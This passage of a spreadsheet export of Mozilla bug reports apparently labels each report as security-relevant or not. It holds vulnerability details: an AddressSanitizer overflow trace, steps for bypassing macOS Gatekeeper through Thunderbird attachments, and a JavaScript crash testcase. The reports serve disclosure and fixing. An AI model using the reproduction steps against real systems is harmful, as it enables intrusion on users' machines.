        <v>22</v>
      </c>
      <c r="W969" t="inlineStr">
        <is>
          <t>Created attachment 655460
Original repro-file.
Tested with build from 
http://people.mozilla.org/~choller/firefox/asan/20120826-mozilla-central-linux64-debug-b3cce81fef1a+asan.html
ASAN-report from the original repro-file:
###!!! ASSERTION: Decoder returned an error but filled the output buffer! Should not happen.: '0 &lt; capacity - haveRead', file /builds/slave/try-lnx64-dbg/build/netwerk/base/src/nsUnicharStreamLoader.cpp, line 225
=================================================================
==1146== ERROR: AddressSanitizer global-buffer-overflow on address 0x7f80ca470002 at pc 0x7f80c2dce5ce bp 0x7ffff1b53d20 sp 0x7ffff1b53d18
READ of size 2 at 0x7f80ca470002 thread T0
    #0 0x7f80c2dce5ce in nsCharTraits&lt;unsigned short&gt;::length(unsigned short const*) /builds/slave/try-lnx64-dbg/build/../../../dist/include/nsCharTraits.h:345
    #1 0x7f80c52900bc in nsAString_internal::Assign(unsigned short const*, unsigned int, mozilla::fallible_t const&amp;) /builds/slave/try-lnx64-dbg/build/xpcom/string/src/nsTSubstring.cpp:304
    #2 0x7f80c5290019 in nsAString_internal::Assign(unsigned short const*, unsigned int) /builds/slave/try-lnx64-dbg/build/xpcom/string/src/nsTSubstring.cpp:290
    #3 0x7f80c2e723c3 in nsString::operator=(unsigned short const*) /builds/slave/try-lnx64-dbg/build/../../dist/include/nsTString.h:65
    #4 0x7f80c46c11a7 in nsDocShell::SetTitle(unsigned short const*) /builds/slave/try-lnx64-dbg/build/docshell/base/nsDocShell.cpp:5236
    #5 0x7f80c46c16b0 in non-virtual thunk to nsDocShell::SetTitle(unsigned short const*) /builds/slave/try-lnx64-dbg/build/media/libvpx/vp8/encoder/x86/quantize_mmx.asm:0
    #6 0x7f80c35ecf4a in nsDocument::DoNotifyPossibleTitleChange() /builds/slave/try-lnx64-dbg/build/content/base/src/nsDocument.cpp:5288
    #7 0x7f80c360a34a in nsRunnableMethodImpl&lt;void (nsDocument::*)(), false&gt;::Run() /builds/slave/try-lnx64-dbg/build/../../../dist/include/nsThreadUtils.h:349
    #8 0x7f80c5248003 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsThread.cpp:624
    #9 0x7f80c5199a93 in NS_ProcessNextEvent_P(nsIThread*, bool) /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:220
    #10 0x7f80c4ecd749 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/try-lnx64-dbg/build/ipc/glue/MessagePump.cpp:82
    #11 0x7f80c52cdca2 in MessageLoop::RunInternal() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:209
    #12 0x7f80c52cdb9f in MessageLoop::Run() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:176
    #13 0x7f80c4c70c82 in nsBaseAppShell::Run() /builds/slave/try-lnx64-dbg/build/widget/xpwidgets/nsBaseAppShell.cpp:165
    #14 0x7f80c482cde1 in nsAppStartup::Run() /builds/slave/try-lnx64-dbg/build/toolkit/components/startup/nsAppStartup.cpp:273
    #15 0x7f80c2abca75 in XREMain::XRE_mainRun() /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3800
    #16 0x7f80c2abdb43 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3877
    #17 0x7f80c2abe4e2 in XRE_main /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3953
    #18 0x408dec in do_main(int, char**) /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:174
    #19 0x4085db in main /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:279
    #20 0x7f80cd06d76d in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:258
0x7f80ca470002 is located 0 bytes to the right of global variable 'gNullChar (/builds/slave/try-lnx64-dbg/build/xpcom/string/src/nsSubstring.cpp)' (0x7f80ca470000) of size 2
==1146== ABORTING
Stats: 235M malloced (239M for red zones) by 324882 calls
Stats: 30M realloced by 21484 calls
Stats: 202M freed by 199576 calls
Stats: 68M really freed by 103398 calls
Stats: 436M (111696 full pages) mmaped in 109 calls
  mmaps   by size class: 8:196596; 9:32764; 10:20475; 11:16376; 12:3072; 13:1536; 14:1280; 15:256; 16:448; 17:1248; 18:192; 19:40; 20:16;
  mallocs by size class: 8:236195; 9:35940; 10:24728; 11:19418; 12:2929; 13:1796; 14:1466; 15:270; 16:632; 17:1255; 18:195; 19:44; 20:14;
  frees   by size class: 8:131552; 9:24822; 10:20131; 11:16183; 12:1854; 13:1549; 14:1301; 15:227; 16:520; 17:1244; 18:140; 19:41; 20:12;
  rfrees  by size class: 8:69590; 9:9871; 10:11815; 11:9747; 12:640; 13:470; 14:487; 15:107; 16:301; 17:358; 18:6; 19:5; 20:1;
Stats: malloc large: 1508 small slow: 1931
Shadow byte and word:
  0x1ff01948e000: 2
  0x1ff01948e000: 02 f9 f9 f9 f9 f9 f9 f9
More shadow bytes:
  0x1ff01948dfe0: 00 00 f9 f9 f9 f9 f9 f9
  0x1ff01948dfe8: 00 f9 f9 f9 f9 f9 f9 f9
  0x1ff01948dff0: 00 00 f9 f9 f9 f9 f9 f9
  0x1ff01948dff8: 00 f9 f9 f9 f9 f9 f9 f9
=&gt;0x1ff01948e000: 02 f9 f9 f9 f9 f9 f9 f9
  0x1ff01948e008: 00 00 00 f9 f9 f9 f9 f9
  0x1ff01948e010: 00 f9 f9 f9 f9 f9 f9 f9
  0x1ff01948e018: 00 f9 f9 f9 f9 f9 f9 f9
  0x1ff01948e020: 00 f9 f9 f9 f9 f9 f9 f9</t>
        </is>
      </c>
      <c r="X969" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="970">
      <c r="A970" t="n">
        <v>64260</v>
      </c>
      <c r="B970" t="inlineStr">
        <is>
          <t>2001-01-03 20:43:25 -0800</t>
        </is>
      </c>
      <c r="C970" t="inlineStr">
        <is>
          <t>NSS users should not include cdbhdl.h.</t>
        </is>
      </c>
      <c r="D970" t="inlineStr">
        <is>
          <t>2001-02-09 17:47:56 -0800</t>
        </is>
      </c>
      <c r="E970" t="n">
        <v>1</v>
      </c>
      <c r="F970" t="n">
        <v>1</v>
      </c>
      <c r="G970" t="n">
        <v>3</v>
      </c>
      <c r="H970" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I970" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J970" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K970" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="L970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N970" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O970" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P970" t="inlineStr"/>
      <c r="Q970" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R970" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S970" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="T970" t="n">
        <v>1</v>
      </c>
      <c r="U970" t="n">
        <v>0</v>
      </c>
      <c r="V970" t="n">
        <v>14</v>
      </c>
      <c r="W970" t="inlineStr">
        <is>
          <t>Some NSS users have had to include the
internal NSS header cdbhdl.h so that they
can allocate a CERTCertDBHandle structure
and pass its address to the cert database
open functions such as CERT_OpenCertDB(),
CERT_OpenCertDBFilename(), and
CERT_OpenVolatileCertDB().
The reason why these NSS users have to call
the cert db open functions directly is that 
the preferred method of using NSS_Init()
doesn't support the naming convention in use
by these NSS users.  Two possible solutions are:
1) Change the cert db open calls to allocate and
return the handle (as is done in the key db interface) -or-
2) Add calls to similar to NSS_Init() that allow the
NSS users to use the current naming convention without
making direct calls to the cert db open interface.
This issue must be resolved before we release
NSS 3.2 Beta.</t>
        </is>
      </c>
      <c r="X970" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="971">
      <c r="A971" t="n">
        <v>1344202</v>
      </c>
      <c r="B971" t="inlineStr">
        <is>
          <t>2017-03-03 05:57:39 -0800</t>
        </is>
      </c>
      <c r="C971" t="inlineStr">
        <is>
          <t>[tcmigration] uptake monitoring script should handle Fennec releases as well</t>
        </is>
      </c>
      <c r="D971" t="inlineStr">
        <is>
          <t>2018-02-28 10:32:07 -0800</t>
        </is>
      </c>
      <c r="E971" t="n">
        <v>1</v>
      </c>
      <c r="F971" t="n">
        <v>1</v>
      </c>
      <c r="G971" t="n">
        <v>5</v>
      </c>
      <c r="H971" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I971" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J971" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K971" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L971" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M971" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N971" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O971" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P971" t="inlineStr"/>
      <c r="Q971" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R971" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S971" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T971" t="n">
        <v>1</v>
      </c>
      <c r="U971" t="n">
        <v>0</v>
      </c>
      <c r="V971" t="n">
        <v>19</v>
      </c>
      <c r="W971" t="inlineStr">
        <is>
          <t>More specifically, [1] needs to be altered a bit to handle the absence of partials, such as a Fennec release is. More into details, I need to:
a) make sure I can skip defining "partial_versions" in its BBB releasetasks task definition as there are no partials within Fennec.
b) within the script[1] itself, I need to alted [2] to handle empty partials and also condition the run of "partials" block from mozharness configs via [3]
Right now the script would fail because there is no "partials" whithin configs[4]
c) make sure the BB itself knows how to handle the beta vs release for Fennec under [5] and [6].
[1]: https://hg.mozilla.org/mozilla-central/file/tip/testing/mozharness/scripts/release/uptake_monitoring.py
[2]: https://hg.mozilla.org/mozilla-central/file/tip/testing/mozharness/scripts/release/uptake_monitoring.py#l80
[3]: https://hg.mozilla.org/mozilla-central/file/tip/testing/mozharness/scripts/release/uptake_monitoring.py#l139
[4]: https://hg.mozilla.org/mozilla-central/file/tip/testing/mozharness/configs/releases/bouncer_fennec.py
[5]: http://hg.mozilla.org/build/buildbot-configs/file/tip/mozilla/config.py
[6]: https://hg.mozilla.org/build/buildbotcustom/file/tip/process/release.py#l1951</t>
        </is>
      </c>
      <c r="X971" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="972">
      <c r="A972" t="n">
        <v>1789061</v>
      </c>
      <c r="B972" t="inlineStr">
        <is>
          <t>2022-09-02 22:19:27 -0700</t>
        </is>
      </c>
      <c r="C972" t="inlineStr">
        <is>
          <t>Thunderbird for macOS (Version 102.2.1) contains a vulnerability to enable Gatekeeper bypass.</t>
        </is>
      </c>
      <c r="D972" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:05 -0700</t>
        </is>
      </c>
      <c r="E972" t="n">
        <v>1</v>
      </c>
      <c r="F972" t="n">
        <v>1</v>
      </c>
      <c r="G972" t="n">
        <v>2</v>
      </c>
      <c r="H972" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I972" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J972" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K972" t="inlineStr">
        <is>
          <t>Thunderbird 102</t>
        </is>
      </c>
      <c r="L972" t="inlineStr">
        <is>
          <t>ARM64</t>
        </is>
      </c>
      <c r="M972" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N972" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O972" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P972" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q972" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R972" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S972" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T972" t="n">
        <v>1</v>
      </c>
      <c r="U972" t="n">
        <v>0</v>
      </c>
      <c r="V972" t="n">
        <v>26</v>
      </c>
      <c r="W972" t="inlineStr">
        <is>
          <t>Summary:
Thunderbird for macOS (Version 102.2.1) contains a vulnerability to enable Gatekeeper bypass.
Background (Gatekeeper):
Gatekeeper is a security mechanism of recent macOS to prevent the execution of an unverified application. This feature builds upon File Quarantine, which works by adding com.apple.quarantine attribute to downloaded files. When an application with com.apple.quarantine attribute is launched, Gatekeeper checks its code signature and its notarization requirement. If these checks are failed, the application is not executed. Files without com.apple.quarantine.attribute are regarded as local files, i.e., these files are trusted, and Gatekeeper does not check these files. com.apple.quarantine attribute is typically added to files downloaded from the internet by applications such as Safari and macOS mail client.
Vulnerability Descriptions:
Thunderbird for macOS does not add com.apple.quarantine attribute to files attached to e-mails. So, when the attached file (e.g., zipped application bundle) is saved locally and executed, its code signature and notarization requirement are not checked.
Steps to reproduce:
1. Save a file attached to an e-mail. In this example, an application bundle named Test.app (not code-signed nor nortaralized) is zipped and attached to the e-mail as Test.zip.
2. Check the extended file attribute of Test.zip by running the xattr command. We cannot check com.apple.quarantine attribute.
3. Unarchive Test.zip and run extracted Test.app. Gatekeeper does not check its execution. So, Test.app is successfully launched even though it is not code-signed nor notarized.
I have also attached PoC movie. Please check it.
Suggested fix:
com.apple.quarantine attribute should be added to files attached to e-mails. We can manually add this attribute by calling setResourceValuves(_:) (https://developer.apple.com/documentation/foundation/url/1779940-setresourcevalues). For more details, see the talk by Patrick Wardle (https://archive.org/details/Gatekeeper_Exposed).</t>
        </is>
      </c>
      <c r="X972" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="973">
      <c r="A973" t="n">
        <v>542849</v>
      </c>
      <c r="B973" t="inlineStr">
        <is>
          <t>2010-01-28 12:56:55 -0800</t>
        </is>
      </c>
      <c r="C973" t="inlineStr">
        <is>
          <t>Assertion failure: targetObj == globalObj in TraceRecorder::traverseScopeChain</t>
        </is>
      </c>
      <c r="D973" t="inlineStr">
        <is>
          <t>2019-04-29 02:46:26 -0700</t>
        </is>
      </c>
      <c r="E973" t="n">
        <v>1</v>
      </c>
      <c r="F973" t="n">
        <v>1</v>
      </c>
      <c r="G973" t="n">
        <v>3</v>
      </c>
      <c r="H973" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I973" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J973" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K973" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L973" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M973" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N973" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O973" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P973" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q973" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R973" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S973" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T973" t="n">
        <v>1</v>
      </c>
      <c r="U973" t="n">
        <v>0</v>
      </c>
      <c r="V973" t="n">
        <v>13</v>
      </c>
      <c r="W973" t="inlineStr">
        <is>
          <t>1. http://www.vanguardia.com.mx/
2. Assertion failure: targetObj == globalObj, at /work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp:12700
1.9.2 win/mac. couldn't reproduce on 1.9.3 mac. sensitive cause the assertion seems scary. saved version of the page didn't assert.
Program received signal SIGTRAP, Trace/breakpoint trap.
JS_Assert (s=0x44784e "targetObj == globalObj", file=0x4442c0 "/work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp", ln=12700) at /work/mozilla/builds/1.9.2/mozilla/js/src/jsutil.cpp:69
69	    abort();
(gdb) bt
#0  JS_Assert (s=0x44784e "targetObj == globalObj", file=0x4442c0 "/work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp", ln=12700) at /work/mozilla/builds/1.9.2/mozilla/js/src/jsutil.cpp:69
#1  0x003cf13d in TraceRecorder::traverseScopeChain (this=0x18165b00, obj=0x155578e0, obj_ins=0x10a2d60, targetObj=0x155576c0, targetIns=@0xbfffbbb4) at /work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp:12700
#2  0x003e0963 in TraceRecorder::callProp (this=0x18165b00, obj=0x155576c0, obj2=0x155576c0, prop=0x1ed03530, id=4547668, vp=@0xbfffbd18, ins=@0xbfffbd14, nr=@0xbfffbd00) at /work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp:7750
#3  0x003e111c in TraceRecorder::scopeChainProp (this=0x18165b00, obj=0x155576c0, vp=@0xbfffbd18, ins=@0xbfffbd14, nr=@0xbfffbd00) at /work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp:7691
#4  0x003e11ef in TraceRecorder::name (this=0x18165b00, vp=@0xbfffbd18, ins=@0xbfffbd14, nr=@0xbfffbd00) at /work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp:11972
#5  0x003e1724 in TraceRecorder::record_JSOP_NAME (this=0x18165b00) at /work/mozilla/builds/1.9.2/mozilla/js/src/jstracer.cpp:12275
#6  0x003e76bd in TraceRecorder::monitorRecording (cx=0x1e988000, tr=0x18165b00, op=JSOP_NAME) at jsopcode.tbl:180
#7  0x002f5528 in js_Interpret (cx=0x1e988000) at jsops.cpp:79
#8  0x00320cb0 in js_Invoke (cx=0x1e988000, argc=1, vp=0x1ea1a26c, flags=0) at jsinterp.cpp:1368
#9  0x002e5b24 in js_fun_apply (cx=0x1e988000, argc=1, vp=0x1ea1a234) at /work/mozilla/builds/1.9.2/mozilla/js/src/jsfun.cpp:2046
#10 0x0030cde3 in js_Interpret (cx=0x1e988000) at jsops.cpp:2208
#11 0x0031f58b in js_Execute (cx=0x1e988000, chain=0x15099020, script=0x1eba5a00, down=0x0, flags=0, result=0x0) at jsinterp.cpp:1601</t>
        </is>
      </c>
      <c r="X973" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="974">
      <c r="A974" t="n">
        <v>672892</v>
      </c>
      <c r="B974" t="inlineStr">
        <is>
          <t>2011-07-20 12:02:59 -0700</t>
        </is>
      </c>
      <c r="C974" t="inlineStr">
        <is>
          <t>Crash [@ JSParseNode::append] or "Assertion failure: !pn-&gt;pn_defn,"</t>
        </is>
      </c>
      <c r="D974" t="inlineStr">
        <is>
          <t>2013-01-04 13:21:49 -0800</t>
        </is>
      </c>
      <c r="E974" t="n">
        <v>1</v>
      </c>
      <c r="F974" t="n">
        <v>1</v>
      </c>
      <c r="G974" t="n">
        <v>3</v>
      </c>
      <c r="H974" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I974" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J974" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K974" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N974" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O974" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P974" t="inlineStr">
        <is>
          <t>[sg:critical?][js-triage-done][qa!]</t>
        </is>
      </c>
      <c r="Q974" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R974" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S974" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T974" t="n">
        <v>1</v>
      </c>
      <c r="U974" t="n">
        <v>0</v>
      </c>
      <c r="V974" t="n">
        <v>32</v>
      </c>
      <c r="W974" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision c9cdc5df55f4 (no options required):
with(startTest){
    for(var TITLE=0 in startTest)
        SECTION('huh');
}</t>
        </is>
      </c>
      <c r="X974" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="975">
      <c r="A975" t="n">
        <v>682988</v>
      </c>
      <c r="B975" t="inlineStr">
        <is>
          <t>2011-08-29 14:45:09 -0700</t>
        </is>
      </c>
      <c r="C975" t="inlineStr">
        <is>
          <t>Add SeaMonkey 2.3.2 to bouncer</t>
        </is>
      </c>
      <c r="D975" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E975" t="n">
        <v>1</v>
      </c>
      <c r="F975" t="n">
        <v>1</v>
      </c>
      <c r="G975" t="n">
        <v>5</v>
      </c>
      <c r="H975" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I975" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J975" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K975" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L975" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M975" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N975" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O975" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P975" t="inlineStr"/>
      <c r="Q975" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R975" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S975" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T975" t="n">
        <v>1</v>
      </c>
      <c r="U975" t="n">
        <v>0</v>
      </c>
      <c r="V975" t="n">
        <v>2</v>
      </c>
      <c r="W975" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #680825 +++
The SeaMonkey team is preparing a chemspill for our current release series, SeaMonkey 2.3.2 (To match Gecko 6.0.1), and once again, we'd like to have the builds added to bouncer for downloads.
The relevant URL snippets for the entries to add are (bouncer and FTP):
?product=seamonkey-2.3.2&amp;os=win
/seamonkey/releases/2.3.2/win32/:lang/SeaMonkey%20Setup%202.3.2.exe
?product=seamonkey-2.3.2&amp;os=linux
/seamonkey/releases/2.3.2/linux-i686/:lang/seamonkey-2.3.2.tar.bz2
?product=seamonkey-2.3.2&amp;os=osx
/seamonkey/releases/2.3.2/mac/:lang/SeaMonkey%202.3.2.dmg
?product=seamonkey-2.3.2-complete&amp;os=win
/seamonkey/releases/2.3.2/update/win32/:lang/seamonkey-2.3.2.complete.mar
?product=seamonkey-2.3.2-complete&amp;os=linux
/seamonkey/releases/2.3.2/update/linux-i686/:lang/seamonkey-2.3.2.complete.mar
?product=seamonkey-2.3.2-complete&amp;os=osx
/seamonkey/releases/2.3.2/update/mac/:lang/seamonkey-2.3.2.complete.mar
?product=seamonkey-2.3.2-partial-2.3.1&amp;os=win
/seamonkey/releases/2.3.2/update/win32/:lang/seamonkey-2.3.1-2.3.2.partial.mar
?product=seamonkey-2.3.2-partial-2.3.1&amp;os=linux
/seamonkey/releases/2.3.2/update/linux-i686/:lang/seamonkey-2.3.1-2.3.2.partial.mar
?product=seamonkey-2.3.2-partial-2.3.1&amp;os=osx
/seamonkey/releases/2.3.2/update/mac/:lang/seamonkey-2.3.1-2.3.2.partial.mar
Bouncer monitors locale `tr` which will be in this release.
Our ETA for release is ASAP, likely early Tuesday.</t>
        </is>
      </c>
      <c r="X975" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="976">
      <c r="A976" t="n">
        <v>546611</v>
      </c>
      <c r="B976" t="inlineStr">
        <is>
          <t>2010-02-17 02:43:28 -0800</t>
        </is>
      </c>
      <c r="C976" t="inlineStr">
        <is>
          <t>TM: "Assertion failure: isNumber(*p) == (t == TT_DOUBLE), at ../jstracer.cpp" or "Assertion failure: isInt32(*p), at ../jstracer.cpp"</t>
        </is>
      </c>
      <c r="D976" t="inlineStr">
        <is>
          <t>2013-03-11 12:42:27 -0700</t>
        </is>
      </c>
      <c r="E976" t="n">
        <v>1</v>
      </c>
      <c r="F976" t="n">
        <v>1</v>
      </c>
      <c r="G976" t="n">
        <v>3</v>
      </c>
      <c r="H976" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I976" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J976" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K976" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L976" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M976" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N976" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O976" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P976" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q976" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R976" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S976" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T976" t="n">
        <v>1</v>
      </c>
      <c r="U976" t="n">
        <v>0</v>
      </c>
      <c r="V976" t="n">
        <v>40</v>
      </c>
      <c r="W976" t="inlineStr">
        <is>
          <t>Assertion failure: isNumber(*p) == (t == TT_DOUBLE), at ../jstracer.cpp:3337
This assert came about from jsfunfuzz but I don't have a reproducible testcase. Filing in case someone can figure out the cause. This occurred in 32-bit js debug shell on TM changeset 7c63a6c5ca78 on 10.6.2.
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000000
Crashed Thread:  0  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:  Dispatch queue: com.apple.main-thread
0   js-dbg-32-tm-darwin                 0x001302bd JS_Assert + 71
1   js-dbg-32-tm-darwin                 0x0015a31d js::TraceRecorder::import(nanojit::LIns*, int, long*, js::TraceType_, char const*, unsigned int, JSStackFrame*) + 243
2   js-dbg-32-tm-darwin                 0x0015abd2 js::TraceRecorder::get(long*) + 374
3   js-dbg-32-tm-darwin                 0x00177036 js::TraceRecorder::setProp(long&amp;, JSPropCacheEntry*, JSScopeProperty*, long&amp;, nanojit::LIns*&amp;) + 796
4   js-dbg-32-tm-darwin                 0x001775f6 js::TraceRecorder::record_SetPropHit(JSPropCacheEntry*, JSScopeProperty*) + 96
5   js-dbg-32-tm-darwin                 0x000b0f24 js_SetPropertyHelper + 2161
6   js-dbg-32-tm-darwin                 0x0008af2b js_Interpret + 85475
7   js-dbg-32-tm-darwin                 0x0009f416 js_Execute + 1401
8   js-dbg-32-tm-darwin                 0x0001198a JS_ExecuteScript + 54
9   js-dbg-32-tm-darwin                 0x0000a650 Process(JSContext*, JSObject*, char*, int) + 458 (js.cpp:446)
10  js-dbg-32-tm-darwin                 0x0000b226 ProcessArgs(JSContext*, JSObject*, char**, int) + 1909 (js.cpp:791)
11  js-dbg-32-tm-darwin                 0x0000b765 main + 953 (js.cpp:4876)
12  js-dbg-32-tm-darwin                 0x0000285d _start + 208
13  js-dbg-32-tm-darwin                 0x0000278c start + 40</t>
        </is>
      </c>
      <c r="X976" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="977">
      <c r="A977" t="n">
        <v>757608</v>
      </c>
      <c r="B977" t="inlineStr">
        <is>
          <t>2012-05-22 14:12:07 -0700</t>
        </is>
      </c>
      <c r="C977" t="inlineStr">
        <is>
          <t>Tell users that they can stay logged in to AoA with a Kitsune account</t>
        </is>
      </c>
      <c r="D977" t="inlineStr">
        <is>
          <t>2012-06-25 07:48:30 -0700</t>
        </is>
      </c>
      <c r="E977" t="n">
        <v>1</v>
      </c>
      <c r="F977" t="n">
        <v>1</v>
      </c>
      <c r="G977" t="n">
        <v>5</v>
      </c>
      <c r="H977" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I977" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J977" t="inlineStr">
        <is>
          <t>Army of Awesome</t>
        </is>
      </c>
      <c r="K977" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L977" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
